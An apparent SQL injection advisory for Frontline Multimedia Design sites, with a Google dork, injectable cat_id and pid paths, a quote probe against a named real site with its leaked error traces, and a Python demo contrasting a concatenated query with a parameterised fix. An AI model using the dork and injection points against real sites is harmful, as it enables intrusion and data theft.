#################################################################################################
# Exploit Title : Site Created by Frontline Multimedia Design Hosting SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/09/2018
# Vendor Homepage : frontlinemultimedia.com ~ frontlinehosting.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Site Created by FRONTLINE MULTIMEDIA DESIGN''
# Exploit :
/catalog/main.php?cat_id=[SQL Injection]
/PATH/main.php?cat_id=[SQL Injection]
/catalog/product.php?cat_id=[ID-NUMBER]&pid=[SQL Injection]
/PATH/product.php?cat_id=[ID-NUMBER]&pid=[SQL Injection]
#################################################################################################
# Example Site => italdecorltd.com/catalog/main.php?cat_id=206%27
# SQL Database Error =>
FATAL [256] SELECT * FROM categories WHERE category_id = '206'' [nativecode=1064 **
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''206''' at line 1]
In file: /home3/italdecorltd/public_html/catalog/lib/SupportTools.php; line: 150
Called from: /home3/italdecorltd/public_html/catalog/lib/CCategory.class.php; function: dbQuery; line: 38
Called from: /home3/italdecorltd/public_html/catalog/main.php; function: CCategory; line: 111
URL: http://www.italdecorltd.com/catalog/main.php?cat_id=206%27
FATAL [256] SELECT * FROM products, product_categories WHERE product_categories.product_id = 2404' AND products.product_id =
product_categories.product_id [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' AND products.product_id = product_categories.product_id' at line 1]
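# The two traces above show the root cause: the request parameter is spliced straight into
# the SQL string, so a single quote in cat_id or pid changes the statement's grammar and
# MySQL answers with error 1064. The script below is an added illustration, not the vendor's
# code: it rebuilds that pattern in Python against an in-memory SQLite table (the real site
# is PHP on MySQL), reproduces the syntax error for the "206'" probe, and shows the hardened
# form that validates the id and binds it as a parameter. The table schema, sample rows and
# function names are assumptions made for the demonstration.

```python
"""Added example: string-concatenated lookup vs. validated, parameterised lookup.

SQLite stands in for MySQL; its OperationalError on an unterminated string literal
is the counterpart of the `nativecode=1064` error shown in the advisory's trace.
"""
import sqlite3


def build_db():
    # Constructed stand-in for the `categories` table named in the error trace;
    # the columns and rows are assumptions, not the vendor's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categories (category_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO categories VALUES (?, ?)",
        [(205, "Tiles"), (206, "Mosaics")],
    )
    return conn


def vulnerable_lookup(conn, cat_id):
    # Mirrors what the trace reveals: the raw parameter is interpolated into the
    # statement, so `206'` becomes  ... category_id = '206''  and no longer parses.
    sql = "SELECT * FROM categories WHERE category_id = '%s'" % cat_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, cat_id):
    # Hardened form: the id must be a plain decimal integer (rejecting quotes,
    # spaces and operators outright), and the value is bound, never concatenated.
    if not isinstance(cat_id, str) or not cat_id.isdigit():
        raise ValueError("cat_id must be a decimal integer")
    return conn.execute(
        "SELECT * FROM categories WHERE category_id = ?", (int(cat_id),)
    ).fetchall()


def reproduce(cat_id):
    """Run both lookups on the same input and report the outcome of each.

    Returns a (vulnerable_outcome, hardened_outcome) pair of short strings so the
    contrast can be checked offline without touching any live site.
    """
    conn = build_db()
    try:
        vuln_result = "rows:%d" % len(vulnerable_lookup(conn, cat_id))
    except sqlite3.OperationalError:
        vuln_result = "syntax error"  # SQLite's equivalent of MySQL nativecode=1064
    try:
        safe_result = "rows:%d" % len(safe_lookup(conn, cat_id))
    except ValueError:
        safe_result = "rejected"
    return vuln_result, safe_result


if __name__ == "__main__":
    # "206" is a legitimate id, "206'" is the probe from the advisory, "abc" is junk.
    for value in ("206", "206'", "abc"):
        print("%-6s -> vulnerable: %-13s hardened: %s" % (value, *reproduce(value)))
```

The legitimate id behaves identically in both versions; the quoted probe breaks the concatenated statement but is simply refused by the hardened one before any SQL runs. In the PHP original the same two controls apply: cast `$_GET['cat_id']` to an integer (or reject non-digits) and pass it through a prepared statement, which also removes the verbose error trace that currently discloses file paths and the query text.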
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################